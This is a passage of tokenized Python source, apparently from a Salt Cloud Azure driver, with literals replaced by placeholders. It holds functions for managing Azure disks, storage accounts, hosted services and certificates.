kwargs , call = None , wait_to_finish = True ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if isinstance ( kwargs [ '<STR_LIT>' ] , str ) : <EOL> volumes = yaml . safe_load ( kwargs [ '<STR_LIT>' ] ) <EOL> else : <EOL> volumes = kwargs [ '<STR_LIT>' ] <EOL> conn = get_conn ( ) <EOL> ret = [ ] <EOL> for volume in volumes : <EOL> if "<STR_LIT>" in volume : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> volume . setdefault ( "<STR_LIT>" , volume . get ( "<STR_LIT:size>" , <NUM_LIT:100> ) ) <EOL> volume . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> volume . setdefault ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] [ : - <NUM_LIT:4> ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume . setdefault ( "<STR_LIT>" , <EOL> kwargs [ "<STR_LIT>" ] + "<STR_LIT>" . format ( volume [ "<STR_LIT>" ] ) ) <EOL> volume_dict = { <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : volume [ "<STR_LIT>" ] <EOL> } <EOL> kwargs_add_data_disk = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> for key in set ( volume . keys ( ) ) - set ( kwargs_add_data_disk ) : <EOL> del volume [ key ] <EOL> result = conn . add_data_disk ( kwargs [ "<STR_LIT>" ] , <EOL> kwargs [ "<STR_LIT>" ] , <EOL> kwargs [ "<STR_LIT>" ] , <EOL> ** volume ) <EOL> _wait_for_async ( conn , result . request_id ) <EOL> msg = ( <EOL> '<STR_LIT>' . format ( <EOL> volume_dict [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> name ) <EOL> ) <EOL> log . info ( msg ) <EOL> ret . append ( msg ) <EOL> return ret <EOL> def _wait_for_async ( conn , request_id ) : <EOL> '''<STR_LIT>''' <EOL> count = <NUM_LIT:0> <EOL> log . debug ( '<STR_LIT>' ) <EOL> result = conn . get_operation_status ( request_id ) <EOL> while result . status == '<STR_LIT>' : <EOL> count = count + <NUM_LIT:1> <EOL> if count > <NUM_LIT> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> result = conn . get_operation_status ( request_id ) <EOL> if result . status != '<STR_LIT>' : <EOL> raise AzureException ( '<STR_LIT>' <EOL> . format ( message = result . error . message , <EOL> code = result . error . code ) ) <EOL> def destroy ( name , conn = None , call = None , kwargs = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> instance_data = show_instance ( name , call = '<STR_LIT:action>' ) <EOL> service_name = instance_data [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> disk_name = instance_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> ret = { } <EOL> try : <EOL> log . debug ( '<STR_LIT>' ) <EOL> result = conn . delete_role ( service_name , service_name , name ) <EOL> delete_type = '<STR_LIT>' <EOL> except AzureException : <EOL> log . debug ( '<STR_LIT>' ) <EOL> try : <EOL> result = conn . delete_deployment ( service_name , service_name ) <EOL> except AzureConflictHttpError as exc : <EOL> log . error ( exc . message ) <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( name , exc . message ) ) <EOL> delete_type = '<STR_LIT>' <EOL> _wait_for_async ( conn , result . request_id ) <EOL> ret [ name ] = { <EOL> delete_type : { '<STR_LIT>' : result . request_id } , <EOL> } <EOL> if __opts__ . get ( '<STR_LIT>' , False ) is True : <EOL> salt . utils . cloud . delete_minion_cachedir ( name , __active_provider_name__ . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] , __opts__ ) <EOL> cleanup_disks = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , default = False , <EOL> ) <EOL> if cleanup_disks : <EOL> cleanup_vhds = kwargs . get ( '<STR_LIT>' , config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , default = False , <EOL> ) ) <EOL> log . debug ( '<STR_LIT>' . format ( disk_name ) ) <EOL> if cleanup_vhds : <EOL> log . debug ( '<STR_LIT>' ) <EOL> def wait_for_destroy ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> data = delete_disk ( kwargs = { '<STR_LIT:name>' : disk_name , '<STR_LIT>' : cleanup_vhds } , call = '<STR_LIT>' ) <EOL> return data <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> return False <EOL> data = salt . utils . cloud . wait_for_fun ( <EOL> wait_for_destroy , <EOL> timeout = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , { } , __opts__ , default = <NUM_LIT:15> * <NUM_LIT> ) , <EOL> ) <EOL> ret [ name ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:name>' : disk_name , <EOL> '<STR_LIT>' : cleanup_vhds , <EOL> '<STR_LIT:data>' : data <EOL> } <EOL> cleanup_services = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False , default = False <EOL> ) <EOL> if cleanup_services : <EOL> log . debug ( '<STR_LIT>' . format ( service_name ) ) <EOL> def wait_for_disk_delete ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> data = delete_service ( kwargs = { '<STR_LIT:name>' : service_name } , call = '<STR_LIT>' ) <EOL> return data <EOL> except AzureConflictHttpError : <EOL> log . debug ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> return False <EOL> data = salt . utils . cloud . wait_for_fun ( <EOL> wait_for_disk_delete , <EOL> timeout = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , { } , __opts__ , default = <NUM_LIT:15> * <NUM_LIT> ) , <EOL> ) <EOL> ret [ name ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:name>' : service_name , <EOL> '<STR_LIT:data>' : data <EOL> } <EOL> return ret <EOL> def list_storage_services ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> accounts = conn . list_storage_accounts ( ) <EOL> for service in accounts . storage_services : <EOL> ret [ service . service_name ] = { <EOL> '<STR_LIT>' : service . capabilities , <EOL> '<STR_LIT>' : service . service_name , <EOL> '<STR_LIT>' : service . storage_service_properties , <EOL> '<STR_LIT>' : service . extended_properties , <EOL> '<STR_LIT>' : service . storage_service_keys , <EOL> '<STR_LIT:url>' : service . url , <EOL> } <EOL> return ret <EOL> def get_operation_status ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:id>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . get_operation_status ( kwargs [ '<STR_LIT:id>' ] ) <EOL> ret = { <EOL> '<STR_LIT>' : data . http_status_code , <EOL> '<STR_LIT:id>' : kwargs [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:status>' : data . status <EOL> } <EOL> if hasattr ( data . error , '<STR_LIT:code>' ) : <EOL> ret [ '<STR_LIT:error>' ] = { <EOL> '<STR_LIT:code>' : data . error . code , <EOL> '<STR_LIT:message>' : data . error . message , <EOL> } <EOL> return ret <EOL> def list_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_storage_accounts ( ) <EOL> pprint . pprint ( dir ( data ) ) <EOL> ret = { } <EOL> for item in data . storage_services : <EOL> ret [ item . service_name ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_storage_account_properties ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> ) <EOL> return object_to_dict ( data ) <EOL> get_storage = show_storage <EOL> def show_storage_keys ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> data = conn . get_storage_account_keys ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> ) <EOL> except AzureMissingResourceHttpError as exc : <EOL> storage_data = show_storage ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> if storage_data [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] == '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> else : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> return object_to_dict ( data ) <EOL> get_storage_keys = show_storage_keys <EOL> def create_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:description>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:location>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> data = conn . create_storage_account ( <EOL> service_name = kwargs [ '<STR_LIT:name>' ] , <EOL> label = kwargs [ '<STR_LIT:label>' ] , <EOL> description = kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> location = kwargs . get ( '<STR_LIT:location>' , None ) , <EOL> affinity_group = kwargs . get ( '<STR_LIT>' , None ) , <EOL> extended_properties = kwargs . get ( '<STR_LIT>' , None ) , <EOL> geo_replication_enabled = kwargs . get ( '<STR_LIT>' , None ) , <EOL> account_type = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def update_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . update_storage_account ( <EOL> service_name = kwargs [ '<STR_LIT:name>' ] , <EOL> label = kwargs . get ( '<STR_LIT:label>' , None ) , <EOL> description = kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> extended_properties = kwargs . get ( '<STR_LIT>' , None ) , <EOL> geo_replication_enabled = kwargs . get ( '<STR_LIT>' , None ) , <EOL> account_type = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> return show_storage ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> def regenerate_storage_keys ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs or kwargs [ '<STR_LIT>' ] not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> data = conn . regenerate_storage_account_keys ( <EOL> service_name = kwargs [ '<STR_LIT:name>' ] , <EOL> key_type = kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return show_storage_keys ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def delete_storage ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> data = conn . delete_storage_account ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def list_services ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_hosted_services ( ) <EOL> ret = { } <EOL> for item in data . hosted_services : <EOL> ret [ item . service_name ] = object_to_dict ( item ) <EOL> ret [ item . service_name ] [ '<STR_LIT:name>' ] = item . service_name <EOL> return ret <EOL> def show_service ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_hosted_service_properties ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs . get ( '<STR_LIT>' , False ) <EOL> ) <EOL> ret = object_to_dict ( data ) <EOL> return ret <EOL> def create_service ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:label>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:location>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> data = conn . create_hosted_service ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT:label>' ] , <EOL> kwargs . get ( '<STR_LIT:description>' , None ) , <EOL> kwargs . get ( '<STR_LIT:location>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def delete_service ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> conn . delete_hosted_service ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def list_disks ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_disks ( ) <EOL> ret = { } <EOL> for item in data . disks : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_disk ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_disk ( kwargs [ '<STR_LIT:name>' ] ) <EOL> return object_to_dict ( data ) <EOL> get_disk = show_disk <EOL> def cleanup_unattached_disks ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> disks = list_disks ( kwargs = kwargs , conn = conn , call = '<STR_LIT>' ) <EOL> for disk in disks : <EOL> if disks [ disk ] [ '<STR_LIT>' ] is None : <EOL> del_kwargs = { <EOL> '<STR_LIT:name>' : disks [ disk ] [ '<STR_LIT:name>' ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , False ) <EOL> } <EOL> log . info ( '<STR_LIT>' . format ( ** del_kwargs ) ) <EOL> data = delete_disk ( kwargs = del_kwargs , call = '<STR_LIT>' ) <EOL> return True <EOL> def delete_disk ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> data = conn . delete_disk ( kwargs [ '<STR_LIT:name>' ] , kwargs . get ( '<STR_LIT>' , False ) ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def update_disk ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> old_data = show_disk ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> data = conn . update_disk ( <EOL> disk_name = kwargs [ '<STR_LIT:name>' ] , <EOL> has_operating_system = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT>' ] ) , <EOL> label = kwargs . get ( '<STR_LIT:label>' , old_data [ '<STR_LIT:label>' ] ) , <EOL> media_link = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT>' ] ) , <EOL> name = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT:name>' ] ) , <EOL> os = kwargs . get ( '<STR_LIT>' , old_data [ '<STR_LIT>' ] ) , <EOL> ) <EOL> return show_disk ( kwargs = { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] } , call = '<STR_LIT>' ) <EOL> def list_service_certificates ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_service_certificates ( service_name = kwargs [ '<STR_LIT:name>' ] ) <EOL> ret = { } <EOL> for item in data . certificates : <EOL> ret [ item . thumbprint ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_service_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_service_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return object_to_dict ( data ) <EOL> get_service_certificate = show_service_certificate <EOL> def add_service_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:data>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:password>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> data = conn . add_service_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT:data>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT:password>' ] , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def delete_service_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> data = conn . delete_service_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT:name>' ] , exc . message ) ) <EOL> def list_management_certificates ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> data = conn . list_management_certificates ( ) <EOL> ret = { } <EOL> for item in data . subscription_certificates : <EOL> ret [ item . subscription_certificate_thumbprint ] = object_to_dict ( item ) <EOL> return ret <EOL> def show_management_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> data = conn . get_management_certificate ( kwargs [ '<STR_LIT>' ] ) <EOL> return object_to_dict ( data ) <EOL> get_management_certificate = show_management_certificate <EOL> def add_management_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:data>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> try : <EOL> conn . add_management_certificate ( <EOL> kwargs [ '<STR_LIT:name>' ] , <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs [ '<STR_LIT:data>' ] , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def delete_management_certificate ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> try : <EOL> conn . delete_management_certificate ( kwargs [ '<STR_LIT>' ] ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureMissingResourceHttpError as exc : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' . format ( kwargs [ '<STR_LIT>' ] , exc . message ) ) <EOL> def list_virtual_networks ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> path = '<STR_LIT>' <EOL> data = query ( path ) <EOL> return data <EOL> def list_input_endpoints ( kwargs = None , conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> kwargs [ '<STR_LIT>' ] , <EOL> kwargs 